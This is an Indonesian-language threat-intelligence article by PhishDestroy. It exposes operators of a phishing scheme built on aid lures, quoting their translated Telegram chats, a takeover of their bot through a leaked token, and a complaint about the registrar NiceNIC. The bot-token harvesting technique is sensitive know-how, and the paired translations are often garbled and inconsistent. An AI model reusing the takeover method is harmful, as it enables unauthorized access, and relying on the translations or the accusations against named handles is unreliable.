Otoritas yang meremehkan — mentalitas atasan, tak mau didiskusikan
TraFFeeQ ChatDesember 2025
"Masih banyak hal yang bisa dilakukan selain bersamamu!"
Tanpa kamu, masih ada banyak hal yang bisa dilakukan)
Menandakan adanya beberapa operasi yang berlangsung secara bersamaan dan membutuhkan perhatiannya

Grup Telegram MONETTI memberikan informasi selengkapnya: Medusa Google Ads (penipuan PPC black-hat), sebuah Saluran Deepfakes (media sintetis untuk penipuan), dan OBROLAN MARLBORO (pribadi, tidak diketahui). Langganan Telegram Premium, jam operasional 24/7, dan "Есть предложение" ("Ada usulan") Profil bisnisnya menggambarkan sosok yang memandang kejahatan siber sebagai usaha penuh waktu.

MONETTI ESCOBAR: Riwayat Pesan Lengkap (10 pesan)
MONETTI ESCOBAR (@monettiescobar) — Riwayat Pesan Terjemahan Lengkap
-- TraFFeeQ Chat | Arbitrase Lalu Lintas | Iklan Hitam/SEO | (9 pesan) --
ME
MONETTI ESCOBAR2025-12-06 20:42
Biarkan saja!Biarkan saja!
ME
MONETTI ESCOBAR2025-12-06 20:42
Seorang pria sedang bekerjaOrang itu sedang mengerjakan pekerjaannya
ME
MONETTI ESCOBAR2025-12-06 20:42
Tanpa agresiTidak ada agresi sama sekali
ME
MONETTI ESCOBAR2025-12-06 20:40
Jangan khawatir soal itu jugaJangan khawatir soal itu juga
ME
MONETTI ESCOBAR2025-12-06 20:39
Coba ajak dia ngobrol, bro. Dia kan boleh melakukan itu.Ayo ngobrol sama dia, bro, dia kan nggak dilarang melakukan itu
ME
MONETTI ESCOBAR2025-12-06 20:39
Ada banyak hal yang bisa dilakukan selain bersamamu!)Ada banyak hal yang bisa kulakukan selain bersamamu!)
ME
MONETTI ESCOBAR2025-12-06 20:39
Tidak ada yang perlu dibicarakan denganmuTidak ada yang perlu dibicarakan denganmu
ME
MONETTI ESCOBAR2025-12-06 20:38
Tertulis di samping julukannya. Kamu nggak perlu mengetuk-ngetuk, kamu pasti bisa membacanya.Di samping nama penggunanya tertulis, "Jangan panggil 'kamu', baca saja"
ME
MONETTI ESCOBAR2025-12-06 20:38
Pria itu melakukan pekerjaannya, dia dibayar untuk itu, (suka berdiskusi)Seseorang melakukan pekerjaannya, dia mendapat bayaran untuk itu, kalau mau, silakan dibahas)
-- Medusa | Google Ads | Obrolan (1 pesan) --
ME
MONETTI ESCOBAR2025-09-23 18:07
😍😍
Profil Telegram MONETTI ESCOBAR
Tangkapan layar 2 — Profil Telegram MONETTI.
Profil Telegram Bonya
Tangkapan layar 3 — Profil Bonya. Perhatikan DC2 (Amsterdam).

Bagian 7: Ruang Panik

Setelah PhishDestroy mengakses grup operator melalui bot Telegram yang terpapar, terjadi percakapan berikut ini. Log obrolan di bawah ini telah diterjemahkan ke dalam bahasa Inggris, dengan teks asli dalam bahasa Rusia tetap dipertahankan dalam huruf miring. Identitas yang digunakan untuk mengakses grup tersebut telah disamarkan.

Kelompok Operator — "Kartu Idr" — Riwayat Obrolan Lengkap (61 pesan)
— REDACTED masuk menggunakan token bot yang terpapar —
R
DITUTUPI25-03-2026 13:03:43
/start
ME
MONETTI ESCOBAR25-03-2026 13:06:53
?
ME
MONETTI ESCOBAR25-03-2026 13:07:03
SiapaSiapa
B
Bonya25-03-2026 13:07:14
XzHz
R
DITUTUPI25-03-2026 13:07:14
Halo, silakan simpan datamu, tunggu sebentar
ME
MONETTI ESCOBAR25-03-2026 13:07:24
Apa-apaan iniApa sih, sialan
B
Bonya25-03-2026 13:07:27
SialSial
B
Bonya25-03-2026 13:07:28
Itulah orangnyaSiapa itu?
ME
MONETTI ESCOBAR25-03-2026 13:07:42
Oya.Ahaha
ME
MONETTI ESCOBAR25-03-2026 13:07:44
Apa-apaan ini?Apa sih
B
Bonya25-03-2026 13:07:53
Bot tersebut telah diretasBot-nya sudah diretas
B
Bonya25-03-2026 13:08:16
Aku dengar pertahanan kita berantakan.Oh ya, ngomong-ngomong, aku dengar sistem pertahanan kita itu gila banget
B
Bonya25-03-2026 13:08:22
Nah, ada satu jenisYa, ada satu orang gitu deh
B
Bonya25-03-2026 13:08:43
Itu seperti membobol bot melalui serangan phishing.Bot kita ini bisa merusak sistem dengan mudah, seperti memukul jari dengan jari
ME
MONETTI ESCOBAR25-03-2026 13:09:09
@devosus
ME
MONETTI ESCOBAR25-03-2026 13:09:21
[DITUTUPI].[DITUTUPI]
ME
MONETTI ESCOBAR25-03-2026 13:09:24
Siapa itu?Siapa itu?
B
Bonya25-03-2026 13:10:29
Periksa profil Anda.Coba cek profilmu
B
Bonya25-03-2026 13:10:32
Itu seorang peretasIni seorang peretas
B
Bonya25-03-2026 13:10:35
Secara harfiah.Secara harfiah
B
Bonya25-03-2026 13:10:41
Menerjemahkan apa yang dia terima melalui channelingTelah diterjemahkan apa yang dia tulis di saluran itu
B
Bonya25-03-2026 13:10:55
[DIHAPUS — Bonya menyalin dan menempelkan pesan dari saluran yang melaporkan domain mereka, dalam upaya mengidentifikasi siapa yang melaporkannya]
B
Bonya25-03-2026 13:12:19
Jadi, eh.Ya sudah lah
B
Bonya25-03-2026 13:12:23
Aku bener-benar nggak tahu siapa orang itu.Siapa sih orang itu, entahlah
B
Bonya25-03-2026 13:12:25
Tapi tidak selamanyaTapi bukan hal yang baik
B
Bonya25-03-2026 13:12:47
@devosus, pikirkan strategi pertahanan sebelum kita dihajar habis-habisan.@devosus, pikirkan soal pertahanan dulu sebelum kita dihajar habis-habisan
Catatan editor: Bonya sudah merasakannya akan terjadi. Anggap saja dia orang Rusia dan menganggap menipu Ukraina sebagai tindakan “patriotik.” Lalu bagaimana dengan Indonesia — sebuah Mitra BRICS sejak Oktober 2024 (KTT Kazan)? Apakah mencuri dari warga negara sekutu juga bisa disebut tindakan patriotik? Para penipu dari CIS adalah pencuri yang tidak pandang bulu, tanpa kecerdasan dan tanpa loyalitas sama sekali. Baca investigasi kami yang lain di mana kami telah mendokumentasikan kasus-kasus penuntutan untuk operator serupa — hasil akhirnya selalu sama.
ME
MONETTI ESCOBAR25-03-2026 13:12:49
Ya, aku mengerti.Ya, aku lihat
ME
MONETTI ESCOBAR25-03-2026 13:12:55
Persetan denganmu.Ah, ngomongin apa sih?
B
Bonya25-03-2026 13:13:09
Yah, merasa lelah juga nggak terlalu seru sih.Yah, disatukan juga nggak terlalu seru sih
ME
MONETTI ESCOBAR25-03-2026 13:13:13
Dia tidak akan melakukan apa-apaDia tidak akan melakukan apa-apa
ME
MONETTI ESCOBAR25-03-2026 13:13:18
Apa yang akan dia lakukan?Apa yang akan dia jual?
D
Devoys25-03-2026 13:13:26
apa ituapa ini
ME
MONETTI ESCOBAR25-03-2026 13:13:34
Ya, ada seorang pria yang bergabungYa, dia sudah bergabung
D
Devoys25-03-2026 13:13:34
dari manadari mana
B
Bonya25-03-2026 13:13:35
Meskipun kamu sudah masuk ke situs phishing itu beberapa kali menggunakan alamat IP-mu sendiri, itu sudah tidak oke lagi.Bahkan kalau sudah beberapa kali masuk ke Fish dari IP-ku, itu udah nggak seru lagi
ME
MONETTI ESCOBAR25-03-2026 13:13:37
Kepada kelompokKe grup
ME
MONETTI ESCOBAR25-03-2026 13:13:38
XzHz
D
Devoys25-03-2026 13:13:39
ketika interpolketika di Interpol
D
Devoys25-03-2026 13:13:41
yang manake mana
ME
MONETTI ESCOBAR25-03-2026 13:13:44
Yang iniIni
B
Bonya25-03-2026 13:13:46
Aku baru saja mampir ke sini buat ngobrolMasuk ke obrolan ini
B
Bonya25-03-2026 13:13:49
Dia menulis bahwaDia menulis bahwa
ME
MONETTI ESCOBAR25-03-2026 13:13:56
.
B
Bonya25-03-2026 13:13:57
Halo, silakan simpan datamu, tunggu sebentar
ME
MONETTI ESCOBAR25-03-2026 13:14:11
[Foto yang dibagikan]
D
Devoys25-03-2026 13:14:31
Aku pernah melihat mereka sebelumnya.Aku sudah pernah melihat yang seperti itu
B
Bonya25-03-2026 13:14:44
Yah, kami juga ketahuan pakai bot Ukr.Yah, kami juga dihajar habis-habisan oleh bot Ukraina
B
Bonya25-03-2026 13:14:55
Kamu tidak mengirim pesan di ruang obrolan.Mereka belum menulis apa pun di obrolan
B
Bonya25-03-2026 13:14:57
Bukankah kamu yang menulisnya?Atau, apakah sudah ditulis?
ME
MONETTI ESCOBAR25-03-2026 13:15:04
Aku nggak peduli.Ah, sudahlah
B
Bonya25-03-2026 13:15:06
Atas nama saluran iniAtas nama saluran ini
D
Devoys25-03-2026 13:15:23
Lupakan saja, sialan.Ah, sudahlah, sialan!
ME
MONETTI ESCOBAR25-03-2026 13:15:31
Aku akan membubarkan grup iniSaya akan menghapus grup ini
B
Bonya25-03-2026 13:15:35
+
D
Devoys25-03-2026 13:15:35
yaya
— Grup dihapus oleh pemiliknya —

Grup itu dihapus dalam hitungan menit. Tanda perpisahan dari Bonya — "+" — dan jawaban Devoys yang menegaskan "iya" sudah cukup menjelaskan semuanya: Mereka tahu bahwa mereka telah terungkap, dan satu-satunya langkah yang bisa mereka ambil adalah menghancurkan barang bukti. Namun, pada saat itu, data tersebut sudah tercatat.

Perhatikan komentar Bonya yang mengungkap hal tersebut: "Kami juga diserang melalui bot Ukraina" — yang menegaskan bahwa kedua proyek tersebut (Ukraina dan Indonesia) dikelola oleh tim operator yang sama, dan ini bukanlah kali pertama infrastruktur mereka diretas.

Bagian 8: Apa yang Ditunjukkan oleh Hal Ini

Cara Kerja PhishDestroy

Setiap domain yang muncul di phishdestroy.io melewati Pipeline otomatis ini. dopomogvoina[.]sbs pun tidak terkecuali.

Deteksi
Analisis Statis
Pemetaan Infrastruktur
Penelusuran Asal-usul
OSINT
Pembuatan Laporan

Jadwal Penyelidikan

20 Maret 2026
Domain dopomogvoina[.]sbs terdaftar melalui NiceNIC International
21 Maret 2026
Terdeteksi oleh Pipeline pemantauan otomatis PhishDestroy
21 Maret 2026
Analisis otomatis sepenuhnya telah selesai: pemetaan infrastruktur telah dilakukan, bundel JS telah diuraikan, dan protokol WebSocket telah didokumentasikan
22 Maret 2026
Alamat IP asal telah teridentifikasi. Proyek phishing kedua ("HealthCare ID") ditemukan di server yang sama
22 Maret 2026
Terungkap config.json memungkinkan identifikasi operator melalui Telegram Bot API
23 Maret 2026
Laporan penyalahgunaan yang diajukan kepada penyedia layanan hosting, Cloudflare, dan CERT terkait
25 Maret 2026
Artikel telah diterbitkan. Laporan domain sudah tersedia di PhishDestroy

Bagaimana Hal Ini Bisa Terjadi: Jaringan Kecerdasan Bot PhishDestroy

Penelitian ini sepenuhnya dilakukan oleh sistem otomatis. Pipeline PhishDestroy tidak hanya mendeteksi domain phishing — sistem ini juga menyusup ke infrastruktur operator yang berada di balik domain-domain tersebut.

2,000+
Bot Telegram yang Diambil Alih
Aktif
Beberapa Bot Masih Dipantau
Sejak tahun 2024
Pengumpulan Sedang Berlangsung

Ketika perangkat phishing membocorkan token bot Telegram — seperti yang terjadi pada kasus ini melalui config.json — sistem kami secara otomatis mengumpulkan data tersebut, memetakan kelompok operator, mengekstrak daftar anggota, dan mengarsipkan riwayat pesan. Lebih dari 2.000 bot telah dikumpulkan dengan cara ini sejak tahun 2024. Beberapa di antaranya masih aktif, dan kami menikmati menyaksikan para penjahat beraksi secara langsung — karena akhir ceritanya sudah ditentukan.

Bahkan para pengguna yang menghapus akun atau menghapus grup mereka pun sudah terlambat. Saat mereka mulai panik, kami sudah memiliki semuanya — arsip pesan, data profil, keanggotaan grup, serta bot yang terhubung. Penghapusan tidak mengubah apa pun. Data tersebut sudah ada, dan kini tersimpan di basis data kami.

"Жди Меня" — Edisi Penipu

Kasus ini bukanlah satu-satunya — ini merupakan contoh nyata dari kelalaian sistematis oleh NiceNIC yang kami putuskan untuk dijadikan contoh "peretas kelas berat." Seperti yang ditunjukkan dengan tepat oleh "Типичный Мошенник": ada perbedaan antara peretas dan penipu — kecerdasan. Para pelaku ini bukanlah peretas maupun orang-orang yang cerdas.

Sistem PhishDestroy secara otomatis mengumpulkan bukti-bukti seperti ini dari ribuan domain — melacak aktivitas bot, mengarsipkan komunikasi operator, serta memetakan infrastruktur. Kasus ini sungguh terlalu absurd untuk tidak dipublikasikan. Kit phishing yang digunakan adalah jenis yang umum beredar, tidak ada sama sekali pengamanan operasional (OPSEC), dan para operator dengan panik menghapus grup mereka dalam hitungan menit setelah terungkap.

Kami sedang mengembangkan sebuah sistem yang akan menampilkan identitas operator yang terverifikasi langsung di halaman laporan domain — dari penipu menjadi korban, seperti acara TV Rusia "Жди Меня" (Tunggu Aku), tapi dalam urutan terbalik. Platform ini telah beroperasi dalam mode tertutup sejak 2024. Banyak operator sudah teridentifikasi — termasuk mereka yang telah menghapus akunnya. Kami sedang menentukan yang paling menarik cara menyampaikannya. Nantikan kabar selanjutnya.

Domain Terkait

Analisis kami mengidentifikasi domain kedua — hlpforvpeople[.]sbs — terdaftar melalui penyedia layanan pendaftaran yang sama dengan pola infrastruktur yang serupa. Kedua domain tersebut tercatat dalam basis data kami:

Pelanggaran Ketentuan oleh Penyedia Layanan Pendaftaran: NiceNIC International

NiceNIC International Group Co., Limited (Hong Kong) telah menerima beberapa laporan pelecehan yang terperinci dari PhishDestroy mengenai keduanya dopomogvoina[.]sbs dan hlpforvpeople[.]sbs. Pada saat diterbitkan — 5 hari setelah laporan pertama — belum ada tindakan yang diambil. Kedua domain tersebut tetap beroperasi secara penuh.

Ini bukanlah kasus yang terisolasi. NiceNIC merupakan masalah yang berulang dalam penyelidikan kami. Alamat kontak pelaporan penyalahgunaan dari registrar (abuse@nicenic.net) secara konsisten gagal menanggapi laporan phishing yang didukung bukti-bukti kuat. Meskipun merupakan registrar yang terakreditasi oleh ICANN dan terikat oleh Perjanjian Akreditasi Registrar (RAA §3.18), NiceNIC beroperasi seolah-olah bebas dari sanksi.

NiceNIC tetap hadir dalam bahasa Rusia, menjual .ru domain dengan harga premium (~$200), dan berkomunikasi dengan klien melalui VK dan Telegram — platform yang populer di kalangan pengguna berbahasa Rusia. Tumpang tindihnya basis klien mereka dengan komunitas bawah tanah menimbulkan pertanyaan serius mengenai apakah ketidakresponsifan pendaftar domain terhadap laporan penyalahgunaan tersebut merupakan kelalaian atau strategi bisnis yang disengaja.

Penelitian ini telah diterbitkan sebagian karena ketidakaktifan NiceNIC yang berkepanjangan. Ketika penyedia layanan pendaftaran domain menolak untuk menindak penyalahgunaan yang berkaitan dengan phishing, pengungkapan ke publik menjadi satu-satunya mekanisme pertanggungjawaban yang tersisa.

Poin-Poin Penting

  • Otomatisasi adalah satu-satunya cara untuk tetap mengikuti perkembangan. Perangkat phishing dapat dipasang dan dimanfaatkan sebagai senjata dalam hitungan jam. Peninjauan manual tidak mampu menyesuaikan diri dengan kecepatan tersebut.
  • Operator bisa saja melakukan kesalahan. Sebuah berkas konfigurasi yang terpapar pada proyek sekunder berhasil mengungkap seluruh operasi phishing berskala multinasional. Sangat sulit untuk mempertahankan OPSEC yang sempurna di setiap proyek.
  • Rekayasa sosial terus berkembang seiring dengan dinamika berita. Perang, bantuan kemanusiaan, dan program pemerintah semakin sering dimanfaatkan sebagai umpan phishing karena menargetkan orang-orang yang sedang dalam kesulitan, yang cenderung tidak mempertanyakan keabsahan hal tersebut.
  • Pemanfaatan kembali infrastruktur sudah menjadi hal yang lazim. Satu server, dua proyek phishing, dua negara, operator yang sama. Pemetaan koneksi infrastruktur mengungkapkan jauh lebih banyak informasi daripada sekadar menganalisis satu domain secara terpisah.

Penelitian Terkait

Penyelidikan lebih lanjut dari Pipeline intelijen otomatis PhishDestroy

Panel TrustWallet Terungkap
Pembobolan panel admin mengungkap operasi phishing kripto lintas negara yang disertai dengan riwayat obrolan operator.
Jaringan Penyedot Kripto Terungkap
Memetakan infrastruktur di balik perangkat phishing yang menguras saldo dompet dan menargetkan pengguna DeFi.
NiceNIC: Penyedia Layanan Pendaftaran Nama Domain yang Memfasilitasi Kejahatan Siber
Bagaimana sebuah registrar yang terakreditasi ICANN secara konsisten mengabaikan laporan penyalahgunaan — termasuk dalam penyelidikan ini.
XMRWallet Terbongkar: 10 Tahun Kunci yang Dicuri
Penipuan dompet Monero yang berlangsung selama satu dekade terungkap melalui analisis JavaScript dan forensik domain.
Infrastruktur Penipuan Terungkap
Hosting bersama, operator bersama — bagaimana jaringan phishing memanfaatkan kembali infrastruktur di berbagai kampanye.
BuyTRX Drainer Terungkap
Penipuan energi berbasis TRON yang menguras dompet melalui persetujuan kontrak pintar yang berbahaya.

Penafian: Penelitian ini dilakukan sepenuhnya melalui pengintaian pasif dan API publik. Tidak ada akses tidak sah yang dilakukan terhadap sistem mana pun. Panggilan API Telegram Bot menggunakan token yang dipublikasikan oleh operator di titik akhir yang tidak memerlukan otentikasi. Semua nama domain dalam artikel ini telah disamarkan sesuai dengan konvensi standar keamanan informasi.

Bagikan Investigasi Ini

X / Twitter Telegram Reddit LinkedIn

Penyelidikan Terkait

Analisis Teknik Phishing Kripto: 8 Program Pencuri Frasa Benih Asli yang Telah Dianalisis Secara Terbalik
PENELITIAN MENDALAM
Analisis Teknik Phishing Kripto: 8 Program Pencuri Frasa Benih Asli yang Telah Dianalisis Secara Terbalik
Penipu Terbongkar: 4 Sistem Belakang Penipuan Diurai
PENYELIDIKAN
Penipu Terbongkar: 4 Sistem Belakang Penipuan Diurai
$0 Takedowns: How We Disrupt Phishing Infrastructure
PENYELIDIKAN
$0 Takedowns: How We Disrupt Phishing Infrastructure